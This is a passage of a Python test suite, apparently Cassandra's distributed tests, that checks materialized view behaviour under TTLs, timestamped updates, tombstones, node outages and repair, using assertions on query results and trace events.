node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
assert not node.grep_log('Marking view', filename='debug.log')
self.check_logs_for_errors()
logger.debug("Check that MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 5000
logger.debug("Restart the cluster")
self.cluster.stop()
marks = [node.mark_log() for node in nodes]
self.cluster.start()
session = self.patient_cql_connection(nodes[0])
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])
logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
for node, mark in zip(nodes, marks):
assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
self._test_mv_with_default_ttl(True)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
self._test_mv_with_default_ttl(False)
def _test_mv_with_default_ttl(self, flush):
"""
        Verify that an MV on a table with default_time_to_live can be deleted properly using expired livenessInfo
@jira_ticket CASSANDRA-14071
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
logger.debug("MV with same key and unselected columns")
session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
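        # Column c is not selected by mv2, so updates to c only affect the view row's liveness
        # (via the base row) rather than any value visible in the view.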
self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
# test with user-provided ttl
self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)
time.sleep(5)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
logger.debug("MV with extra key")
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 2, 1])
assert_one(session, "SELECT * FROM mv", [1, 2, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
# user provided ttl
self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 4, 1])
assert_one(session, "SELECT * FROM mv", [1, 4, 1])
self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 5, 1])
assert_one(session, "SELECT * FROM mv", [1, 5, 1])
self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
"""
        An old view row should be shadowed if all base columns, including unselected ones, are removed,
        and the view row should be recreated if at least one selected column is alive.
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected column, view row is removed
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# update unselected with ts=3, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
        # insert livenessInfo, view row should be alive
self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be alive because of base livenessInfo alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# delete with ts=3, view row should be alive due to unselected@ts4
self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be removed
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=7, view row is alive
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected with ts=7, view row is dead
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
        # add selected with ts=5, view row is alive (selected columns should not affect each other)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# add selected with ttl=20 (we apparently need a long ttl because the flushing etc that self.update_view does can take a long time)
self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
time.sleep(20)
        # update unselected with ttl=20, view row should be alive
self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
time.sleep(20)
        # once the TTL expires, both the base row and the view row should be gone
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_base_column_in_view_pk_complex_timestamp(self, flush):
"""
        An old view row should be shadowed and the view row re-inserted when the base column's ts is
        greater than the pk's ts, and likewise when it is smaller than the pk's ts.
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=1
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
# increase b ts to 10
self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
# set row TS = 20, a@6, b@20
self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# create another view row
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
# stop node2, node3
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
logger.debug('Shutdown node3')
node3.stop(wait_other_notice=True)
# shadow a = 1, create a = 2
query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
        # shadow (a=2, k=2) after 3 seconds
query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
logger.debug('Starting node2')
node2.start(wait_for_binary_proto=True)
logger.debug('Starting node3')
node3.start(wait_for_binary_proto=True)
        # For k = 1 & a = 1, we should get a digest mismatch for the tombstones, which then gets repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 0 == len(result.current_rows)
# For k = 1 & a = 1, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
assert 0 == len(result.current_rows)
        # For k = 1 & a = 2, we should get a digest mismatch for the data, and a = 2 gets repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 1 == len(result.current_rows)
# For k = 1 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 1 == len(result.current_rows)
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
time.sleep(3)
        # For k = 2 & a = 2, we should get a digest mismatch for the expired row, which then gets repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
logger.debug(result.current_rows)
assert 0 == len(result.current_rows)
# For k = 2 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
"""
        Test that MV queries with LIMIT properly handle rows with expired liveness
@jira_ticket CASSANDRA-13883
"""
session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
for k in range(100):
session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
        # generate view rows with expired liveness, except for rows 50 and 99
for k in range(100):
if k == 50 or k == 99:
continue
session.execute("DELETE a FROM t where k = {};".format(k))
        # there should be 2 live rows
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
# verify IN
keys = range(100)
assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
[50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
# verify fetch size
session.default_fetch_size = 1
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
"""
        View row deletion should be commutative with newer view livenessInfo; otherwise deleted columns may be resurrected.
@jira_ticket CASSANDRA-13409
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
# sstable 1, Set initial values TS=1
self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
        # sstable 2, delete the base row at TS=2; the resulting tombstone removes the view row
self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_none(session, "SELECT * FROM t")
# sstable 3, tombstones of mv created by base deletion should remain.
self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None])
# sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 2, None, None])
# sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
# shadow view row (id=1, v=1)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_one(session, "SELECT * FROM t", [1, None, None, None])
def test_view_tombstone(self):
"""
        Test that materialized views properly tombstone
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
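        # With node2 down, the following QUORUM write is missed by node2; the later CL=ALL read
        # should detect a digest mismatch and repair it once node2 is back.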
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
consistency_level=ConsistencyLevel.QUORUM))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
        # Check whether the query trace contains digest mismatch events and verify that
        # this matches the expect_digest flag.
# Look for messages like:
# 4.0+ Digest mismatch: Mismatch for key DecoratedKey
# <4.0 Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
self.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
self.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
"""
        Test that a materialized view is consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
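        # Write all data while node2 is down so it misses the updates; the data only becomes
        # consistent at CL=ALL after repairing either the base table or the view.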
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in range(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
logger.debug('Start node2, and repair')
node2.start(wait_for_binary_proto=True)
if repair_base:
node1.nodetool("repair ks t")
if repair_view:
node1.nodetool("repair ks t_by_v")
logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
for i in range(1000):
query = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
            assert self._rows_to_list(result.current_rows) == [[i, i, 'a', 3.0]]
def test_base_replica_repair(self):
self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
"""
Test repair does not fail when there is MV lock contention
@jira_ticket CASSANDRA-12905
"""
self._base_replica_repair_test(fail_mv_lock=True)
def _base_replica_repair_test(self, fail_mv_lock=False):
"""
        Test that a materialized view is consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Write initial data')
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug('Shutdown node1')
node1.stop(wait_other_notice=True)
logger.debug('Delete node1 data')
node1.clear(clear_all=True)
jvm_args = []
if fail_mv_lock:
if self.cluster.version() >= LooseVersion('3.10'): # CASSANDRA-10134
jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
# this should not make Keyspace.apply throw WTE on failure to acquire lock
node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
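        # With node2 and node3 down, reads can only be served by node1, whose data was wiped,
        # so the view should appear empty until node1 is repaired.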
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
logger.debug('Verify that there is no data on node1')
for i in range(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
logger.debug('Restarting node2 and node3')
node2.start(wait_for_binary_proto=True)
node3.start(wait_for_binary_proto=True)
# Just repair the base replica
logger.debug('Starting repair on node1')
node1.nodetool("repair ks t")
logger.debug('Verify data with cl=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
@pytest.mark.resource_intensive
def test_complex_repair(self):
"""
        Test that a materialized view is consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
